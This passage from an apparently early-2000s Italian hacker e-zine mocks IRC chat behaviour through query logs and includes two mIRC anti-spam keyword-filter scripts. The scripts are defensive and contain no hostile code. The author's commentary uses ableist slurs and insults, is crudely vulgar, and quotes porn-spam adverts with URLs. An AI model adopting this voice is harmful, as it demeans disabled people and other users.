8=molto stupido 9=idiota 10=molto idiota 11=tarato 12=cervello di gallina 13=senza possibilità di recupero 14=parassita della società 15=hanticappato 16=clinicamente morto 17=impossibile la convivenza 18=caso clinico perso --=sYn=--=syn@hackersat.com=--www.hackersat.com=-- /===========================::=============================::=================/ / /L'approccio in rete e more... / sYn / /===========================::=============================::=================/ Salve ragazzi e ragazze!Preso un impegno io tendo sempre a mantenerlo.(chiedetelo a chi mi conosce meglio,anzi NO non glielo chiedete!) Comunque sia, adesso mi appresto ad illustrarvi un po' come funzione l'approccio in rete; non solo con i sessi opposti. Sono stato meno approfondito ma decente a descrivere i comportamenti. Dato che voglio far divertire un po' Smav' passo subito alle caxxate vere e proprie: (usando un mIRC client) Entro in un canale della mia città o altri, ed ecco cosa mi succede : Innanzitutto mi trovi in su' migliaia di query aperte che mi fanno porre un interrogativo : Che cazzo è???? Start of eresha buffer: Thu Mar 29 18:51:47 2001 http://gina21.xorg2000.com xchè ? -> [eresha] PING xchè dovrei andare in questo sito? Stai facendo solo pubblicità ? sono troppo noioso ? End of eresha buffer Thu Mar 29 18:51:47 2001 Naturalmente la chat è un ottimo posto per fare pubblicità al proprio sito. Molti sfruttano di tutto per tempestare con pubblicità gli utenti e metterli a conoscenza dei propri siti o altri...questo purtroppo è una cosa un po' rompiballe (avanti si porra' meglio il problema) Il bello e che non ti rispondono. Cio' dico se my query devi anche sopportare la mia risposta..maro' mi fanno talmente incaxxare; un giorna di questi li devo flodda' a uno a uno e li devo rienpire di brutte parole. Vabbè questo non è niente osseravate adesso. Start of Stefaniet buffer: Thu Mar 29 18:42:11 2001 Ciaooo ho appena messo delle nuove foto sul mio sito, corri a vederle http://www.stefania.allow.it ( 0,4 ® PÎZzÄ §©rÎpT©1,0 (13Auto Messaggio) ) End of Stefaniet buffer Thu Mar 29 18:42:11 2001 Bello il nome peccato che quella delle foto non sei tu. Altrimenti ti sarei venuto a prendere a casa!! Poi. Start of P|4tin3t buffer: Thu Mar 29 18:42:29 2001 www.sessopornohard.com - COME PROMESSO PRONTI GIA' SUL SITO, SIA DA SCARICARE CHE DA VEDERE DIRETTAMENTE,!! 10 FILMINI HARD!!, E NUOVISSIME IMMAGINI. www.sessopornohard.com - DIMENTICAVO DAL PRIMO APRILE NUOVO SERVIZIO CON WEBCAM DAL VIVO CON CUI CHATTARE ( 0,4 ® PÎZzÄ §©rÎpT©1,0 (13Auto Messaggio) ) End of P|4tin3t buffer Thu Mar 29 18:42:29 2001 Mettiamo caso che non ero io ma un bambimo ad avere questa query(tanto si sa' anche i ragazzini chattano) cosa avrebbe fatto?UUU che bello i filmini, che belle le immaginine, la webcamma bellissimo ci voglio andare mamma mamma.... . Start of alessia78 buffer: Thu Mar 29 18:43:27 2001 Ciao, scusa il disturbo...volevo segnalarti un sito dove puoi mandare infiniti SMS a tutti i GSM del mondo GRATUITAMENTE!! www.elbaisola.com se non sei interessato...scusami! ( 0,4 ® PÎZzÄ §©rÎpT©1,0 (13Auto Messaggio) ) End of alessia78 buffer Thu Mar 29 18:43:27 2001 Bello il nick...gia' mi aaspettavo qualcosa di sensuali alla "cliccami per godere" oppure www.hardhardxxx.comitnet il sito dove puoi trovare di tutto!Invece mi si presenta un bel messaggio automatico con tanti di scuse! Complimenti volevo quasi contattare l'autorema poi...ci ho ripensato.Cmq alessia78 ti voglio beneeeeeee. Scusate. . Start of Fuoco73 buffer: Thu Mar 29 18:40:04 2001 programmi gratis e tanto altro su www.xxxxxxxxservice.com ( 0,4 ® PÎZzÄ §©rÎpT©1,0 (13Auto Messaggio) ) End of Fuoco73 buffer Thu Mar 29 18:40:04 2001 Vaffanbip tu e i tuoi programmi...Cmq se lo sapete molti usano nomi femminili per attirare(ma questo era risaputo).A questi tipi potete fare gli scherzetti che fanno i lamerucci come ava !! Sentite questa, è la dimostrazione che IRC a volte da' in testa ! Session Start: Thu Mar 29 18:44:42 2001 18:44:42 ma de cheeeeeeeeeeeeeeeee 18:44:51 ? -=> Nick: Guest61533 id: misterixe Host: ****.dialup.tiscalinet.it Full name: mister -=> on chanz: #sesso #roma -=> using server: twisted.ma.us.dal.net Global NAPs - Quincy, MA 18:45:05 niente ciao 18:45:20 :| Session Close: Thu Mar 29 18:52:13 2001 Questo tizio, mentre io sto tanto bello zitto e muto in rete mi chiama per dirmi :"ma de cheeeeeeeeeeeeeeeee" !!MA allora si scem...è vero dovrebbero mettere dei medici on line; ce ne è proprio la necessità (a volte mi farebbe comodo anche a me!) Vedete questa. Start of Yvano buffer: Thu Mar 29 18:44:31 2001 Ciao sono m ti posso fare una domanda?? 12 4°Tíþëttª S©®íþt° (4Messaggio Automatico) si -> [Yvano] PING ma.... che cazzo metti sto messaggio se poi non rispondi...... fXXK End of Yvano buffer Thu Mar 29 18:44:31 2001 Il tizio con un messaggio dice se poteva pormi una domanda e io EDUCATAMENTE dico di sì. Ma dato che dall'altra parte il tizio è sordo (non vedente!) lo rispondo meno educatamente di prima...dopo un po' mi trovo con la scritta: -Yvano- m'hai rotto er kazzo! [-Ignorato-] °Tíþëttª S©®íþt° Pfff. sono cose da pazzi... Bene bene,adesso inizia il dialogo(chiamatelo anche dialogo!!!) : arriva un tizio con un nome un po' da frescone. Session Start: Mon Mar 26 22:41:54 2001 22:41:54 ciao 22:42:46 ciao 22:42:47 sono m 22:42:55 addio allora Session Close: Mon Mar 26 22:42:59 2001 (io ormai ho imparato MOLTO bene la lezione, quindi appena vedo un nome maschile che mi saluta io non faccio altro che dirgli :Ciao,sono m.Fino ad ora questo metodo ha funzionato benissimo, ve lo consiglio !:) Cosa è successo allora ? Mica ho detto che sono un drogato?Un pedofilo?Un ninfomane?Un arrapato mentale?Ho detto semplicemento che sono di sesso maschile. E lui addirittura mi rispobde così:" addio allora" !!!Cavolo a me fa piacere che non ci sentiremo +, pero' un po di educazione non guasta. adesso ci proco io. Session Start: Tue Mar 27 20:16:49 2001 20:16:50 ciao Session Close: Tue Mar 27 20:25:25 2001 MMM nessuna risposta, strano lo ho anche pingata, ho un brutto nickname? Impossibile ho visto gente con dei nick SPAVENTOSI e RIVOLTANTI avere le migliori discussioni in rete!! Riproviamo, il nick mi convince. Session Start: Tue Mar 27 20:16:39 2001 20:16:42 ciao ofelia 20:17:20 ciao 20:17:31 sei di salerno ? 20:22:30 ci 6 ? 20:22:40 ho sbagliato domanda ? 20:22:42 CTCP: PING To: ofelia83 Session Close: Tue Mar 27 20:25:23 2001 Ma che cavolo è ma sono tanto antipatico, un normale ragazzo ditemi allora come puo' iniziare un normale dialogo con una ragazza della propria città...poi dicono tramite la chat si puo' arrivare al matrimonio..seeee..il matrimonio puo' avvenire ma sarà tra due anomali di mente! Sfrutto l'occasione per dirvi che ho avuto solo con una ragazza dela mia città una lunga discussione, con tanto di scambio numeri,che oserei dire bellissima...ma questo a mio resoconto è solo un caso raro. continuiamo.Adesso è un tizio che mi contatta. Session Start: Mon Mar 26 22:31:18 2001 Session Ident: Guest54347 (aaa@sa1-753.dialup.tiscalinet.it) 22:31:18 ciao anni da dove dgt???? 22:31:27 sono m 22:31:41 ti interesso ? 22:31:59 addiiiiioooooooooooooo!!!!!!!!!!!!!!!!!!!!! 22:32:08 grazie 22:32:18 prego Session Close: Mon Mar 26 22:33:04 2001 Questa volta all'addio lo ho risposto, anche se molto semplicemente.Proprio non c'è un metodo per scampare ad una query e agli auto messaggi,anzi per gli automessaggio degli insulsi script vi farebbe molto comodo azionare un'antispam; magari settando le parole chiavi tipo : auto Benvenuto Crackrock DDD-YYY-NNN-AAA-MMM-III-RRR-CCC http JudoX M3n0k4 Mâgïç PÎZzÄ script S[R|pT S¢riþT SçRÎpT Venom Welcome www ynamirc §©®îpt ÐÏÊ ëgátiñØ Simpson Ultimamente questo add-on si trova su svariati script.Ma dato che io sono molto "un bravo ragazzo" ve li inserisco here : questo è l'antispam n°1 _____________________________________________________________________________________ ANTISPAM N°1 leggimi.txt --www.hackersat.com-- leggimi.txt To install this addon type /load -rs antispam\installa.ini Per installare questa addon scrivi /load -rs antispam\installa.ini Please no rip this script Non rippare questo questo script Bye spam.txt dialog ms-antispam { title "hackersat ANTISPAM" size -1 -1 230 225 box "Scritto da Lains", 49, 5 5 220 180 text "ON", 1, 110 25 70 15 text "OF", 2, 158 25 70 15 text "Sex-Url", 3, 40 50 60 15 text "M o F?", 4, 40 70 60 15 text "CyberSex-Prot", 5, 40 90 70 15 text "Inviti", 6, 40 110 70 15 text "Spam-Script", 7, 40 130 70 15 text "Insulti", 8, 40 150 70 15 radio "", 12, 110 53 20 10, right group radio "", 13, 158 53 20 10, right radio "", 14, 110 73 20 10, right group radio "", 15, 158 73 20 10, right radio "", 16, 110 93 20 10, right group radio "", 17, 158 93 20 10, right radio "", 18, 110 113 20 10, right group radio "", 19, 158 113 20 10, right radio "", 20, 110 133 20 10, right group radio "", 21, 158 133 20 10, right radio "", 22, 110 153 20 10, right group radio "", 23, 158 153 20 10, right button "Chiudi Il Dialog", 24, 20 190 200 25, ok default } on 1:dialog:ms-antispam:sclick:*: { if ($did == 12) { enable #Protezionesesso | echo 3 Protezione SeX URL ON } if ($did == 13) { disable #Protezionesesso | echo 3 Protezione SeX URL OFF } if ($did == 14) { enable #mof | echo 3 M o F on } if ($did == 15) { disable #mof | echo 3 M o F off } if ($did == 16) { enable #cybersexprot | echo 3 Protezione C-sex ON } if ($did == 17) { disable #cybersexprot | echo 3 Protezione C-SEX OFF } if ($did == 18) { enable #invitiprot | echo 3 Protezione inviti ON } if ($did == 19) { disable #invitiprot | echo 3 Protezione inviti OFF } if ($did == 20) { enable #scriptitaliani | echo 3 Protezione Spam Script ON } if ($did == 21) { disable #scriptitaliani | echo 3 Protezione Spam Script OFF } if ($did == 22) { enable #insulti-prot | echo 3 Protezione Insulti-Prot ON } if ($did == 23) { disable #insulti-prot | echo 3 Protezione Insulti-Prot OFF } } menu menubar { M-S Prot Query:/dialog -m ms-antispam ms-antispam frasi.txt #Protezionesesso off on 1:text:*www*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot on 1:text:*http*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot on 1:text:*XXX*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot #Protezionesesso end #cybersexprot off on 1:text:*donna*per*cybersex*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot on 1:text:*cerco*donna*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot on 1:text:*sei*lurida*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot on 1:text:*donna*disinibita*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot on 1:text:*cerco*donna*per*sesso*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot on 1:text:*sei*porca*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot #cybersexprot end #mof off on 1:text:*M*o*F*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No M o F!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No M o F!! Prot #mof end #invitiprot off on 1:text:*tutti*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot on 1:text:*ti*aspetto*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot on 1:text:*join*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot on 1:text:*e'*nato*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot on 1:text:*ndate*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot on 1:text:*vieni*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot on 1:text:*entate*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot on 1:text:*ti*aspettiamo*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot on 1:text:*#*il*canale*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot #invitiprot end #scriptitaliani off on 1:text:*S©®íþt*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot on 1:text:*PÎZzÂ*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot on 1:text:*Auto*Messaggio*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot on 1:text:*Messaggio*Automatico*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot on 1:text:*Auto*Messa*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot on 1:text:*dynamirc*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot on 1:text:*hello.to*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot on 1:text:*move.to*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot on 1:text:*Dynamrc*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec.(MonDoScRiPT) on 1:text:*Ðynamrc*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec.(MonDoScRiPT) on 1:text:*4(512Dynamirc54)*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. #scriptitaliani end #insulti-prot off on @1:text:*puttan*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*troia*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*mignott*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*vaffancul*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*bastard*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*sborr*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*porcodi*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*fotti*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*pompin*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:*sgualdrin*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:dio por*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! on @1:text:dio ca*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!! #insulti-prot end installa.ini [script] n0=;Antispam install n1=on 1:load: { n2=load -rs antispam\frasi.txt n3=load -rs antispam\spam.txt n4=echo Antispam Caricato n5=echo E' una fase beta e verra' aggiornata n6=echo Consigli sono molto graditi. Hackersat.com n7=unload -rs antispam\installa.ini n8=} _____________________________________________________________________________________ ed ecco il secondo _____________________________________________________________________________________ ANTISPAM N°2 leggimi.txt =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-= ANTISPAM =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-= /load -rs antispam.ini per caricarlo. Funziona con mIRC 5.6 o superiori. inserisci il file sp.bmp nella directory di mirc.exe =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-= ANTISPAM =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-= sp.bmp (inseritegli un'immagine qualunque come titolo,90 x 12,2 pixel) antispam.ini [script] n0=; x.X.X. n1=; xXxXXXX" n2=; "XxXXK*`8b n3=; "xXX'88888) n4=; o `X''..""" o n5=; 8)iiiiiIIIIIiiii(8 n6=; ' "iiIIII" ` Antispam hackersat.com n7=; ]iIII[ script costruito leggendo le guide di helpdesk. n8=; iiIIII n9=; _."iiII"._ n10=; a888o a888o n11=on 1:load: { n12= echo -a $versione.antipspam n13= echo -a AntiSpam v.2.0. funziona con mIRC 5.6 e superiori, tu ora stai usando il mIRC 4 $VERSION n14= echo -a --new-- Fixato bug nell'edit box che non permetteva di inserire parole lunghe n15= echo -a --new-- Tolto il remove ascii che creava solo casini aggiuntivi n16= echo -a per bloccare uno spam o una url che ti arriva di frequente in query, inserisci la parola intera nell'edit e clikka su add. n17= echo -a $versione.antipspam n18= set %spam-parole messaggio,sesso,cybersex,Dynamirc,Ðynamirc,DYNAMRC,ScRipT³,Dynamrc'99,Dynamirc'99,Ðynamrc,°MËñòkª,NýTrÖ,menok,G|G4Byt3,§©rÎpT,ScRiPt,!Dynamirc!,porno,guadagnare,http://hello.to/dynamirc,4(512Ðynamirc54),http://dynamirc.cjb.net,http://dynamirc.tsx.org,4(512Ðynamirc'9954) n19= set %status-antispam AntiSpam Spento n20= set %spam-ignore 1 n21= set %spam-tempoignore 30 n22= set %spam-ignoremask 3 n23= set %spam.bloccati 0 n24=} n25=dialog spam { n26= title "spam Setup" n27= size 50 100 445 230 n28= button "fine", 1, 321 120 100 40, ok n29= edit "", 2, 220 80 200 18,center,autohs,autovs n30= EDIT "", 3, 220 100 200 18,center,autohs,autovs n31= edit "", 9, 1 22 210 20, left,autohs,autovs n32= list 10, 1 45 210 120, extsel size n33= button "Add", 11, 2 1 60 20, default n34= button "Deleta", 12, 65 1 50 20, default n35= check "Ignore?", 13, 240 1 86 20, right n36= text "Per quanti Secondi?", 14, 240 22 121 20, left n37= edit "", 15, 360 19 40 20, right,autohs,autovs n38= text "Hostmask", 16, 240 48 158 20, left n39= combo 17, 300 45 120 120, drop n40= button "AttivaI", 18, 220 120 100 20, default n41= button "Spegni",19 , 220 140 100 20, default n42= icon 33, 10 150 400 100, sp.bmp n43=} n44= n45=on *:DIALOG:spam:init:0: { n46= did -a spam 3 Spam Bloccati: %spam.bloccati n47= did -a spam 2 %status-antispam n48= if (%spam-parole) { spam-parole } n49= did -a spam 17 *!user@host.domain n50= did -a spam 17 *!*user@host.domain n51= did -a spam 17 *!*@host.domain n52= did -a spam 17 *!*user@*.domain n53= did -a spam 17 *!*@*.domain n54= did -a spam 17 nick!user@host.domain n55= did -a spam 17 nick!*user@host.domain n56= did -a spam 17 nick!*@host.domain n57= did -a spam 17 nick!*user@*.domain n58= did -a spam 17 nick!*@*.domain n59= if (%spam-tempoignore) { n60= did -a spam 15 %spam-tempoignore n61= } n62= else { n63= did -a spam 15 30 n64= } n65= if (%spam-ignoremask) { n66= did -c spam 17 %spam-ignoremask n67= } n68= else { n69= did -c spam 17 1 n70= } n71= if (%spam-ignore == $null) || (%spam-ignore == 0) { n72= did -b spam 14 n73= did -b spam 15 n74= did -b spam 16 n75= did -b spam 17 n76= } n77= else { n78= did -c spam 13 n79= } n80=} n81=on *:DIALOG:spam:sclick:1:sbiliguda n82=on *:DIALOG:spam:sclick:11:aggiungi.parola n83=on *:DIALOG:spam:sclick:12:deleta.parola n84=on *:DIALOG:spam:sclick:13:diddalo n85=on *:DIALOG:spam:sclick:18:accendi n86=on *:DIALOG:spam:sclick:19:spegni n87=;============> Gruppi n88=#spam on n89=on !1:text:*:?: { n90= %spam-ricerca-loop = 0 n91= :loop n92= inc %spam-ricerca-loop n93= %spam-ricerca-ok = $gettok(%spam-parole,%spam-ricerca-loop,44) n94= %spam-ricerca-stringa = $remove($strip($1-),$chr(44)) n95= if (%spam-ricerca-ok) { n96= if ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,*) > 0) || ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,32) > 0) { n97= if (%spam-ignore == 1) { n98= close -m $nick n99= ignore -u [ $+ [ %spam-tempoignore ] ] $nick %spam-ignoremask n100= inc %spam.bloccati n101= msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam n102= echo -a $bloccato " $+ %spam-ricerca-ok $+ " n103= } n104= else { n105= inc %spam.bloccati n106= msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam n107= echo -a $bloccato " $+ %spam-ricerca-ok $+ " n108= } n109= } n110= else { goto loop } n111= } n112= unset %spam-ricerca-* n113=} n114=on !1:notice:*:?: { n115= %spam-ricerca-loop = 0 n116= :loop n117= inc %spam-ricerca-loop n118= %spam-ricerca-ok = $gettok(%spam-parole,%spam-ricerca-loop,44) n119= %spam-ricerca-stringa = $remove($strip($1-),$chr(44)) n120= if (%spam-ricerca-ok) { n121= if ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,*) > 0) || ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,32) > 0) { n122= if (%spam-ignore == 1) { n123= close -m $nick n124= ignore -u [ $+ [ %spam-tempoignore ] ] $nick %spam-ignoremask n125= inc %spam.bloccati n126= msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam n127= echo -s $bloccato " $+ %spam-ricerca-ok $+ " n128= $cancella n129= } n130= else { n131= inc %spam.bloccati n132= msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam n133= echo -s $bloccato " $+ %spam-ricerca-ok $+ " n134= $cancella n135= } n136= } n137= else { goto loop } n138= } n139= unset %spam-ricerca-* n140=} n141=#spam end n142=;============> Aliases n143=alias aggiungi.parola { n144= if ($did(spam,9).text) && ($findtok(%spam-parole,$did(spam,9).text,0,44) < 1) && ($chr(44) !isin $did(spam,9).text) { n145= %spam-parole = $addtok(%spam-parole,$did(spam,9).text,44) n146= did -a spam 10 $did(spam,9).text n147= did -r spam 9 n148= } n149=} n150=alias deleta.parola { n151= if ($did(spam,10).sel) { n152= :loop n153= %spam-parole = $remtok(%spam-parole,$did(spam,10,$did(spam,10).sel).text,44) n154= did -d spam 10 $did(spam,10).sel n155= if ($did(spam,10,0).sel > 0) { n156= goto loop n157= } n158= } n159=} n160=alias spegni { n161= set %status-antispam AntiSpam Spento n162= did -r spam 2 n163= did -a spam 2 %status-antispam n164= ./.disable #spam n165= echo -a $spentoz n166=} n167=alias accendi { n168= set %status-antispam AntiSpam Attivo n169= did -r spam 2 n170= did -a spam 2 %status-antispam n171= ./.enable #spam n172= echo -a $attivoz n173=} n174=alias diddalo { n175= if ($did(spam,13).state == 1) { n176= did -e spam 14 n177= did -e spam 15 n178= did -e spam 16 n179= did -e spam 17 n180= } n181= else { n182= did -b spam 14 n183= did -b spam 15 n184= did -b spam 16 n185= did -b spam 17 n186= } n187=} n188=alias sbiliguda { n189= %spam-ignore = $did(spam,13).state n190= %spam-tempoignore = $did(spam,15).text n191= %spam-ignoremask = $did(spam,17).sel n192=} n193=alias -l spam-parole { n194= %spam-parole-caricate = 0 n195= :loop n196= inc %spam-parole-caricate n197= if ($gettok(%spam-parole,%spam-parole-caricate,44)) { n198= did -a spam 10 $gettok(%spam-parole,%spam-parole-caricate,44) n199= goto loop n200= } n201= unset %spam-parole-caricate n202=} n203=alias cancella { clear -s } n204=alias bloccato { return 4<<< 7Spam bloccato4 >>> } n205=alias attivoz { return 4<<< 7AntiSpam Attivo4 >>> } n206=alias spentoz { return 4<<< 7AntiSpam Spento4 >>> } n207=alias versione.antipspam { return 4<<< 7AntiSpam http:\\www.hackersat.com 4 >>> } n208=;============> Menu n209=menu menubar,status { n210= [=== AnTI-SpaM ===]:/dialog -m spam spam n211=} _____________________________________________________________________________________ MA TORNIAMO A NOI. Ci sarebbe un'altro metodo cioè quello di mettere come proprio nickname ad esempio "sono_m", ci ho provato una volta (ero proprio esausto per farlo) e devo dire che ha funzionato proprio bene!Solo che l'inconveniente è proprio il nick :non vi sembra orrendo ?? cmq adesso vi continuo a riportare queste caxxatelle di log :) adesso ci provo io.Ho visto il nick Pandoram e allora mi ricordai una vecchia filastrocca!! Session Start: Tue Mar 27 20:15:40 2001 20:15:42 ciao 20:16:13 pandora ti porterò al palazzo,ti mostrerò il mio ca..ro e amato genitor... 20:16:15 hihih 20:16:18 ci 6 ? Session Close: Tue Mar 27 20:25:21 2001 Comunque la filastrocca continuava così se non vado errato : pandora ti porterò in bottega, tu mi farai una se..mplice dichiarazione d'amor. Pandora andremo nella **iga (diga?), mi mostrerai la fi..ne di questo grande amor. andiamo avanti . Session Start: Mon Mar 26 21:42:01 2001 21:42:01 ciao m o f 21:42:07 m Session Close: Mon Mar 26 21:42:08 2001 Uno dei discorsi + lungo di tutto il secolo! Questi sono ragazzi che non vogliono nemmeno sprecare un po' di tempo,xchè o sono alla caccia disperata o sono dei tirati di primo ordine! adesso alle prese con un mongoloide! Session Start: Sat Mar 24 20:01:13 2001 20:01:13 ciao principessa!come stai? Session Close: Sat Mar 24 20:01:18 2001 Non stai bene ?? Una principessa di nome sYn non laho mai vista, ma...no comment! avanti. Session Start: Sat Mar 24 20:06:11 2001 20:06:11 ciao 20:06:19 ciao 20:06:20 sono m Session Close: Sat Mar 24 20:06:24 2001 lungo anche questo. avanti. Session Start: Mon Mar 26 21:33:38 2001 21:33:38 CIAO 21:33:44 ciao 21:33:45 sono m 21:33:55 OK 21:33:59 GRAZIE 21:34:01 CIAO Session Close: Mon Mar 26 21:34:03 2001 NON CI POSSO CREDERE? Era un grazie quello? Impossibile sono stato alle prese con un ragazzo che usa l'educazione in chat! Questo è da prendere come esempio e modello. MA (xchè c'è sempre un MA nella vita...) questo è un caso. Ragazzi mi sono un po' annoiato ,per non dire un'altra parola. Devo pensare a fare altre cose quindi adesso vi lascio.Spero che questo articolo vi sia piaciuto e vi abbia fatto conoscere come è "fatta" la chat su IRC e il contrasto tra i sessi opposti. Dovete capire bene come ci si deve comportare alle prese di "affamati" ragazzi; alcuni logs io non li ho messi ma molti mi auguravano anche buona caccia! HIHIHIHIH. (Che bello manca la mia prof di italiano per tutta la settimana, ieri sono stato in gita, e ho pariato tantooo.Abbiamo conosciuto cinesi e spagnole, con quest'ultime abbiamo parlato a fondo con i nostri commenti in dialetto napoletano che si potevano nascondere!!Nel pullman abbiamo fatti i giochi + bambineschi di questo pianeta, e dopo mi so' messo ad ascoltare un po' i Placebo ; Cavolo mi avete rotto le cuffie!!!) Ho fatto questa parentesi xchè mi hanno riferito che potevo scrivere di tutto ..hihih; fate finta cmq che io non abbia detto niente. IMMACOLATA TI AMO GIADA TI AMO SARA TI AMO !!! Vi voglio bene a tutti! (sopratutto a Smav!) Volevo salutare in particolare Skam e Ghent dell'h@. per qualunque cosa o incomprensione scrivetemi. sYn --=|www.hackersat.com|=----=|syn@hackersat.com|=-- /===========================::=============================::=================/ / /Carnivore Diagnostic Tool / Screener_it / /===========================::=============================::=================/ Carnivore Diagnostic Tool */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Autore: Screener_it email: screener_it@freemail.it URL: http://go.to/tankcommandos DATA: 22/03/01 